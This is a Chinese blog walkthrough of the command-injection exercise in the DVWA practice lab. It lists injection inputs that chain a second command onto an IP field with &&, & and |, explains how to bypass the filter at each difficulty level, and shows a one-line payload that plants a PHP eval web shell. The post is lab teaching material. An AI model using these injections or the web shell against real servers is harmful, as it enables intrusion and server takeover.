首页 > 其他分享 >DVWA靶场之命令注入

DVWA靶场之命令注入

时间:2023-12-25 14:03:03浏览次数:29  
标签:7.28 DVWA 命令 Command && 靶场 执行 注入

命令注入简介

命令注入(Command Injection, 又叫操作系统命令注入为shell注入):指在开发需求中,需要引入对系统本地命令的支持来完成某些特定的功能。当未对输入参数进行严格过滤时,则有可能发生命令注入。

原因:

程序对输入与输出的控制不够严格,导致精心构造的命令输入在后台执行后产生危害。

危害:

攻击者可使用命令注入来执行系统终端命令,直接接管服务器的控制权限。

允许攻击者在运行应用程序的服务器上执行任意操作系统命令,并且会完全破坏应用程序及其所有数据。

乱码的解决

DVWA靶场之命令注入_php

在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset=utf-8”,修改”charset=gb2312”,即可

DVWA靶场之命令注入_应用程序_02

low

192.168.7.28 && ipconfig

DVWA靶场之命令注入_应用程序_03

192.168.7.28 && dir

DVWA靶场之命令注入_应用程序_04

192.168.7.28 && systeminfo

DVWA靶场之命令注入_应用程序_05

能否上传木马

127.0.0.1 & echo “<?php @eval($_POST[cmd])?>” > webshell.php

DVWA靶场之命令注入_php_06

DVWA靶场之命令注入_php_07

medium

输入&&攻击命令,发现提示参数错误,表明有过滤,但是只针对了”&&”和”;”进行了过滤。

输入”IP & dir”时,同样可以攻击,表明没有对”&”过滤,”&&”和”&”是有区别的,”&&”是短路运算符,只有前一步执行成功才会执行后一步,而”&”则两个表达式都会执行。

Command 1&&Command 2

先执行Command 1,执行成功后执行Command 2,否则不执行Command 2

Command 1&Command 2

先执行Command 1,不管是否成功,都会执行Command 2

Command 1 || Command 2

先执行Command 1,再执行Command 2;若Command 1成功,不执行Command 2;

Command 1| Command 2

先执行Command 1,再执行Command 2;不管Command 1是否成功,都会执行Command 2。

192.168.7.28 & ipconfig

DVWA靶场之命令注入_服务器_08

192.168.7.28 | ipconfig

DVWA靶场之命令注入_应用程序_09

192.168.7.28 | route print

DVWA靶场之命令注入_服务器_10

high

DVWA靶场之命令注入_服务器_11

敏感的字符都被过滤了,但是 | 明显后面有个空格,所以如果不使用空格的话依然可以绕过

127.0.0.1 |ipconfig

DVWA靶场之命令注入_服务器_12

127.0.0.1 |route print

DVWA靶场之命令注入_应用程序_13








标签:7.28,DVWA,命令,Command,&&,靶场,执行,注入
From: https://blog.51cto.com/heliotopekxy/8967649

相关文章

  • .NET 8最强新功能:键控服务依赖注入
    什么是键控服务依赖注入?在之前的依赖注入中,服务是根据其类型进行注册和解析的。如果出现同一接口有多个实现怎么办呢?这时候就可以使用.NET8的新功能“键控服务依赖注入”。它允许您注册接口的多个实现,每个实现都与一个唯一键相关联,然后基于该键解析所需的实现。在.NET8中的实......
  • 【C#】.net core 6.0 通过依赖注入注册和使用上下文服务
    给自己一个目标,然后坚持一段时间,总会有收获和感悟!请求上下文是指在Web应用程序中处理请求时,包含有关当前请求的各种信息的对象。这些信息包括请求的头部、身体、查询字符串、路由数据、用户身份验证信息以及其他与请求相关的数据。目录一、DbContext1.1、创建自定义类1.2、注册......
  • java接口自动化系列(05):测试数据注入到测试方法
     注入测试数据这里我们是数据驱动方式,把数据注入到测试方法上一篇我们已经把用例数据封装到对象并放到list中,这里我们把用例对象list中的对象分别放到Object类型的一维数组中,再把一维数组添加到新对象类型一维数组的list中然后我们在测方法中打印获取到的用例数据,看获取到的......
  • 初识SQL注入
    初识SQL注入↗1、SQL注入原理SQL注入漏洞是指攻击者通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中,而网站应用程序未对其进行过滤,将恶意SQL语句带入数据库使恶意SQL语句得以执行,从而使攻击者通过数据库获取敏感信息或者执行其他恶意操作。2、SQL注入危害➢绕过登录......
  • 最新Docker搭建DVWA和SQLi-LABS漏洞练习平台
    搭建DVWADVWA是一款开源的渗透测试漏洞练习平台,内含XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等漏洞的测试环境。可以在Docker Hub上搜索DVWA,有多个用户共享了搭建好的DVWA镜像(注意,有些镜像可能存在后门),此处选择镜像——sagikazarmark/dvwa,安装命令如下:docker pull......
  • 【misc】[HNCTF 2022 WEEK2]calc_jail_beginner_level4.1(JAIL) --沙盒逃逸,python模板
    这道题没给附件,直接连上看看这里一开始用().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([115,104]).decode())进行尝试,后面发现bytes函数被禁用了,可以用另外的函数代替().__class__.__base__.__subclasse......
  • Spring中的依赖注入DI
    目录Spring中的依赖注入DISpring中的依赖注入DI依赖注入的简单理解就是给对象设置变量值。Spring配置文件<?xmlversion="1.0"encoding="UTF-8"?><beansxmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSch......
  • vulnhub Me and My Girlfriend靶场
    目录1.信息收集2.漏洞挖掘3.漏洞利用4.提升权限1.信息收集扫描存活主机sudoarp-scan-l扫描主机的开放端口nmap-p-192.168.42.156扫描端口具体开放服务nmap-p22,80-A-sV192.168.42.156扫描网站指纹whatweb192.168.42.1562.漏洞挖掘访问网站F12,查看html......
  • 【misc】[HNCTF 2022 WEEK2]calc_jail_beginner_level4(JAIL) --沙盒逃逸,python模板注
    查看附件信息这里禁用了__import__,直接导致了help()函数和breakpoint()函数没法使用,并且还过滤了关键字符,这里考虑python模板注入,但是这里还过滤chr(),这里可以使用bytes函数payload如下:().__class__.__base__.__subclasses__()[-4].__init__.__globals__['system']('sh')......
  • Owasp Top10 漏洞解析 之注入
    一、注入漏洞是什么?注入漏洞,即将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入NoSQL注入、OS注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命今或访问数据。几乎任何数据源都能成为注入载体,包括环境变量......